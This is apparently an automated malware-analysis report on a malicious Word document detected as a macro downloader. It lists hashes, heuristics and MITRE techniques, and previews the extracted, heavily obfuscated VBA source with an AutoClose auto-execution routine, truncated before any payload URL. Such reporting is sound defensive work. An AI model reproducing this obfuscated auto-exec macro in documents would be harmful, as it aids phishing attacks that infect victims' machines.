Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d75ac458dae898ed…

MALICIOUS

Office (OLE)

241.0 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: 6cc972c56cff6526c76bd44743cd8768 SHA-1: 74d88f683f67b691941064a75286ba8b972f965f SHA-256: d75ac458dae898ed59f5140e2a31b9154acd7e8d5387c95453080bce8073ed1e
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Valyria-6595163-0'. It contains VBA macros, specifically an Auto_Close macro, which is a common technique for executing malicious code upon document closure. The presence of GetObject calls within the macro further suggests an attempt to interact with the system or download external resources. The macro's obfuscated nature and the lack of clear URLs or commands within the provided script excerpts prevent a more detailed analysis of its specific actions, but the overall pattern indicates a downloader.

Heuristics 7

  • ClamAV: Doc.Downloader.Valyria-6595163-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 69583 bytes
SHA-256: 77c2eecfe6c467e47badb36ec4357bb834f85c1650b714bc5e8f4a7dfec0644c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub iusowawETabja()

Dim gItujavEhKYPa
gItujavEhKYPa = Rnd(136)
If gItujavEhKYPa > 58159 Then
   gItujavEhKYPa = Exp(6)
End If
QIsIcejIRObekoX = Val("89946.6") & "zisIXAaAHYsIbE"

Dim FaBaMqEbUhew
FaBaMqEbUhew = Rnd(133)
If FaBaMqEbUhew > 6599 Then
Debug.Print "FEToJGeCOF"
hYKEaIFAM = Val("87427.7") & "UQixaqIxiWEbyRik"
   FaBaMqEbUhew = Exp(3)
lUDguaobesygaSYgOG = 70113
End If
Dim JyjCateauHeCiRaXoao
JyjCateauHeCiRaXoao = Log(5)

JyjCateauHeCiRaXoao = JyjCateauHeCiRaXoao + Log(10)
End Sub
Sub AutoClose()
Dim dujAPEqAhYZARyMAQIce
For dujAPEqAhYZARyMAQIce = 6 To 12
   Dim DAraporAZeWYQWAxa
   DAraporAZeWYQWAxa = Fix(55166)
Next
Dim qYDUzmiHycIRimuFi
qYDUzmiHycIRimuFi = Log(2)

qYDUzmiHycIRimuFi = qYDUzmiHycIRimuFi + Log(10)
Dim wkARUGYlIlydECeiEQAl
wkARUGYlIlydECeiEQAl = Rnd(1110)
If wkARUGYlIlydECeiEQAl > 22082 Then
nAioDTOLOj = 19744
Dim keKeiEwikEdI
For keKeiEwikEdI = 9 To 12
   Dim ZuBElogIrOQUVRe
   ZuBElogIrOQUVRe = Fix(69234)
Next
   wkARUGYlIlydECeiEQAl = Exp(10)
End If
iUHAGatOzH = 62980
On Error Resume Next

Dim PivoHEjCON
PivoHEjCON = Rnd(1110)
If PivoHEjCON > 80599 Then
   PivoHEjCON = Exp(10)
End If
GyfiaoWYBOvYpiMaTEqItAz = 99525

Dim cUhaWuwOSyQKulECYwizamO
For cUhaWuwOSyQKulECYwizamO = 3 To 11
   Dim bYhYnOqylygyCEMYqaKoZI
   bYhYnOqylygyCEMYqaKoZI = Fix(61927)
Next
dIxoQeTUrFifuLiGUWydOB = InStr("jOXanoPaLytucuaiNiveWy", "jOXanoPaLytucuaiNiveWyjOXanoPaLytucuaiNiveWy")
Dim seJuPUbEpiY
Debug.Print "boVICUsAGfOloJytOL"
For seJuPUbEpiY = 7 To 11
   Dim xEBnhiwURErave
   xEBnhiwURErave = Fix(71043)
Dim PiPYHuNaqAREK
For PiPYHuNaqAREK = 2 To 10
   Dim NYJuKoPuvoki
   NYJuKoPuvoki = Fix(91724)
Next
Next
TeAhipaGoJeMeDyiY = ""
Debug.Print "jymUXocuaOlaMUiUROTEty"
Dim TuBadiaOVenaXUROMYJon
TuBadiaOVenaXUROMYJon = Log(5)

TuBadiaOVenaXUROMYJon = TuBadiaOVenaXUROMYJon + Log(11)
Dim QaSIHADOWOhYrEDegAcYWY
Dim lejIqAcwYfitavM
lejIqAcwYfitavM = Log(1)

lejIqAcwYfitavM = lejIqAcwYfitavM + Log(12)
For QaSIHADOWOhYrEDegAcYWY = 6 To 11
   Dim dtytoNOmYBU
Dim gucErOPECYmUZI
For gucErOPECYmUZI = 2 To 13
   Dim SySOwiBUQufyHyDULyVIx
   SySOwiBUQufyHyDULyVIx = Fix(74333)
Next
Dim FePoDICyrdebiDo
For FePoDICyrdebiDo = 1 To 12
   Dim JOFEvFYxEh
   JOFEvFYxEh = Fix(28819)
Next
   dtytoNOmYBU = Fix(33228)
aaKyQAVeiySaqycU = InStr("yzAlaQeXImo", "yzAlaQeXImoyzAlaQeXImo")
Next

Debug.Print "bOhYKUDYcYbufIZOHROrYv"
bacETuVOfoBEWItEcA = Val("75566.6") & "sADAjImOSINU"

 TeAhipaGoJeMeDyiY = TeAhipaGoJeMeDyiY + IIf((266 + 532) = 798, "s", "HdI")
Dim fevuCagEvYiExOtEjUH
fevuCagEvYiExOtEjUH = Log(10)

fevuCagEvYiExOtEjUH = fevuCagEvYiExOtEjUH + Log(12)
Dim BEwazaJicalUCU
CEviwYmAcOMoQijY = Val("55734.5") & "ZemoliHOcOPIcihOBOwqbY"
nuduKExGbEpoaIHofUP = 40304
BEwazaJicalUCU = Rnd(118)
KEDuquUTYqULifYKyLedAV = InStr("dUCESibyBeBeePivAP", "dUCESibyBeBeePivAPdUCESibyBeBeePivAP")
Dim iaSuxuDanAFYLUT
For iaSuxuDanAFYLUT = 10 To 10
   Dim ZAfiaOraruHE
   ZAfiaOraruHE = Fix(48875)
Next
If BEwazaJicalUCU > 53272 Then
   BEwazaJicalUCU = Exp(8)
Dim aamOmYSeTIgIFejuLE
aamOmYSeTIgIFejuLE = Rnd(137)
If aamOmYSeTIgIFejuLE > 39270 Then
   aamOmYSeTIgIFejuLE = Exp(7)
End If
End If

Dim YdIHeKHUQWEPEZyJoVy
YdIHeKHUQWEPEZyJoVy = Log(7)
FAzYDAqUtikYg = InStr("TogOSytuHuPOjavAmAL", "TogOSytuHuPOjavAmALTogOSytuHuPOjavAmAL")
Dim iiQOleiuQaDusagOBuXa
iiQOleiuQaDusagOBuXa = Log(6)

iiQOleiuQaDusagOBuXa = iiQOleiuQaDusagOBuXa + Log(10)

YdIHeKHUQWEPEZyJoVy = YdIHeKHUQWEPEZyJoVy + Log(10)
Dim MOvyWudUcILezuqitoVIYG
lONOQAVevefeDuMe = Val("70412.10") & "psYboBejYvyt"
Dim nwABoFEYrugiFoTalYwuiU
nwABoFEYrugiFoTalYwuiU = Log(3)

nwABoFEYrugiFoTalYwuiU = nwABoFEYrugiFoTalYwuiU + Log(13)
For MOvyWudUcILezuqitoVIYG = 1 To 11
Debug.Print "WIxIBeoF
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.